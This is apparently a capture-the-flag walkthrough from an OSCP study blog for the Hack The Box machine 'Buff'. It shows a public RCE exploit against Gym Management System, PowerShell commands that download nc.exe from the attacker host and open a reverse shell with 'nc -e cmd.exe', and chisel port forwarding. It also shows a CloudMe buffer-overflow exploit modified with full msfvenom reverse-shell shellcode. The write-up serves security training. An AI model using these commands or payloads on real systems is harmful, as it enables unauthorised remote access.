Follow along in my OSCP journey, this is my target 8 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.198
Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
At least we know what to exploit!
Web— 8080
Gobuster
/About.php (Status: 200) [Size: 5337]
/Contact.php (Status: 200) [Size: 4169]
/Home.php (Status: 200) [Size: 143]
/Index.php (Status: 200) [Size: 4969]
/LICENSE (Status: 200) [Size: 18025]
/about.php (Status: 200) [Size: 5337]
/contact.php (Status: 200) [Size: 4169]
/boot (Status: 301) [Size: 342]
/ex (Status: 301) [Size: 340]
/img (Status: 301) [Size: 341]
/include (Status: 301) [Size: 345]
include/process_login.php
HINT
There is 1 clear piece of information on one of the pages which unlocks the next step, can you find it?
.
.
.
.
We see the following information
Let’s look for exploits for that software!
Gym Management System 1.0 - Unauthenticated Remote Code Execution | exploits/php/webapps/48506.py
Sweet RCE available for that version of the software
python 48506.py http://10.10.10.198:8080/
Let’s get some information about the user
Let’s try to get a stable reverse shell.
First, we’ll host nc.exe
on a file server.
Let’s grab nc.exe
, start a listener and get a reverse shell.
powershell -c iwr http://10.10.14.46/nc.exe -outf \users\shaun\downloads\nc.exe\users\shaun\downloads\nc.exe 10.10.14.46 1337 -e cmd.exe
Getting Root
This one comes down to spotting the unusual things
HINT
Was there something in the folder we uploaded our nc.exe?
.
.
.
.
The download folder has an interesting software
Let’s look for exploits!
CloudMe 1.11.2 - Buffer Overflow (PoC)| exploits/windows/remote/48389.py
First of all, can we see it running on the machine? We can see in the exploit that it is looking for port 8888, let us see if it is listening …
netstat -ano
We found it!
Proto Local Address Foreign Address State PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 948 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 4160 TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 8376 TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 7844 TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 528 TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1104 TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1580 TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2188 TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668 TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 684 TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4 TCP 10.10.10.198:8080 10.10.14.46:54732 ESTABLISHED 7844 TCP 10.10.10.198:51051 10.10.14.46:1337 ESTABLISHED 8280 TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 6740 TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 2000 TCP [::]:135 [::]:0 LISTENING 948 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:7680 [::]:0 LISTENING 8376 TCP [::]:8080 [::]:0 LISTENING 7844 TCP [::]:49664 [::]:0 LISTENING 528 TCP [::]:49665 [::]:0 LISTENING 1104 TCP [::]:49666 [::]:0 LISTENING 1580 TCP [::]:49667 [::]:0 LISTENING 2188 TCP [::]:49668 [::]:0 LISTENING 668 TCP [::]:49669 [::]:0 LISTENING 684 UDP 0.0.0.0:123 *:* 7552 UDP 0.0.0.0:5050 *:* 4160 UDP 0.0.0.0:5353 *:* 2036 UDP 0.0.0.0:5355 *:* 2036 UDP 0.0.0.0:62110 *:* 2036 UDP 0.0.0.0:63009 *:* 2036 UDP 10.10.10.198:137 *:* 4 UDP 10.10.10.198:138 *:* 4 UDP 10.10.10.198:1900 *:* 5364 UDP 10.10.10.198:58415 *:* 5364 UDP 127.0.0.1:1900 *:* 5364 UDP 127.0.0.1:55197 *:* 3052 UDP 127.0.0.1:58417 *:* 5364 UDP [::]:123 *:* 7552 UDP [::]:5353 *:* 2036 UDP [::]:5355 *:* 2036 UDP [::]:62110 *:* 2036 UDP [::]:63009 *:* 2036 UDP [::1]:1900 *:* 5364 UDP [::1]:58414 *:* 536
There are a couple of things we need to do before we can run the exploit
Exposing the service to our kali machine
We use chisel.exe
for our port forwarding, it works in a client-server manner.
On Kali, we can just start the server part
chisel server -p 6666 --reverse
On the victim, we upload the client and run the client
powershell -c iwr http://10.10.14.46/chisel -outf \users\shaun\downloads\chiselstart chisel client 10.10.14.46:6666 R:8888:127.0.0.1:8888
Modifying the exploit
First, we change the target with a localhost IP because we’re using chisel
that exposes the server locally to our machine.
target = "127.0.0.1"
Secondly, the payload seems to pop a calculator, which’s great for testing but we’d rather have a reverse shell or something, let’s create our own. We make sure to keep the bad characters out of our payload.
sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.46 LPORT=5555 -b '\x00\x0a\x0d' -f pythonbuf = b""
buf += b"\xda\xd8\xbb\x34\x2a\xda\xf1\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x52\x31\x58\x17\x83\xe8\xfc\x03\x6c\x39\x38"
buf += b"\x04\x70\xd5\x3e\xe7\x88\x26\x5f\x61\x6d\x17\x5f\x15"
buf += b"\xe6\x08\x6f\x5d\xaa\xa4\x04\x33\x5e\x3e\x68\x9c\x51"
buf += b"\xf7\xc7\xfa\x5c\x08\x7b\x3e\xff\x8a\x86\x13\xdf\xb3"
buf += b"\x48\x66\x1e\xf3\xb5\x8b\x72\xac\xb2\x3e\x62\xd9\x8f"
buf += b"\x82\x09\x91\x1e\x83\xee\x62\x20\xa2\xa1\xf9\x7b\x64"
buf += b"\x40\x2d\xf0\x2d\x5a\x32\x3d\xe7\xd1\x80\xc9\xf6\x33"
buf += b"\xd9\x32\x54\x7a\xd5\xc0\xa4\xbb\xd2\x3a\xd3\xb5\x20"
buf += b"\xc6\xe4\x02\x5a\x1c\x60\x90\xfc\xd7\xd2\x7c\xfc\x34"
buf += b"\x84\xf7\xf2\xf1\xc2\x5f\x17\x07\x06\xd4\x23\x8c\xa9"
buf += b"\x3a\xa2\xd6\x8d\x9e\xee\x8d\xac\x87\x4a\x63\xd0\xd7"
buf += b"\x34\xdc\x74\x9c\xd9\x09\x05\xff\xb5\xfe\x24\xff\x45"
buf += b"\x69\x3e\x8c\x77\x36\x94\x1a\x34\xbf\x32\xdd\x3b\xea"
buf += b"\x83\x71\xc2\x15\xf4\x58\x01\x41\xa4\xf2\xa0\xea\x2f"
buf += b"\x02\x4c\x3f\xff\x52\xe2\x90\x40\x02\x42\x41\x29\x48"
buf += b"\x4d\xbe\x49\x73\x87\xd7\xe0\x8e\x40\xd2\xfe\x9e\xbe"
buf += b"\x8a\xfc\x9e\xab\xf9\x88\x78\xb9\xed\xdc\xd3\x56\x97"
buf += b"\x44\xaf\xc7\x58\x53\xca\xc8\xd3\x50\x2b\x86\x13\x1c"
buf += b"\x3f\x7f\xd4\x6b\x1d\xd6\xeb\x41\x09\xb4\x7e\x0e\xc9"
buf += b"\xb3\x62\x99\x9e\x94\x55\xd0\x4a\x09\xcf\x4a\x68\xd0"
buf += b"\x89\xb5\x28\x0f\x6a\x3b\xb1\xc2\xd6\x1f\xa1\x1a\xd6"
buf += b"\x1b\x95\xf2\x81\xf5\x43\xb5\x7b\xb4\x3d\x6f\xd7\x1e"
buf += b"\xa9\xf6\x1b\xa1\xaf\xf6\x71\x57\x4f\x46\x2c\x2e\x70"
buf += b"\x67\xb8\xa6\x09\x95\x58\x48\xc0\x1d\x68\x03\x48\x37"
buf += b"\xe1\xca\x19\x05\x6c\xed\xf4\x4a\x89\x6e\xfc\x32\x6e"
buf += b"\x6e\x75\x36\x2a\x28\x66\x4a\x23\xdd\x88\xf9\x44\xf4"
Running the modified exploit
Time to get it all working together, we set the listener and we execute the modifier exploit
python 48389.py
Let’s go, another owned machine!
What did I learn?
- We learned to make sure to always check any service version and see if they are vulnerable to anything.
- We learned how to port forward a service using
chisel.exe
- We learned how to understand and modify an existing exploit.
Quite a simple one but could easily bring us down some rabbit holes. I hope you liked it!
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.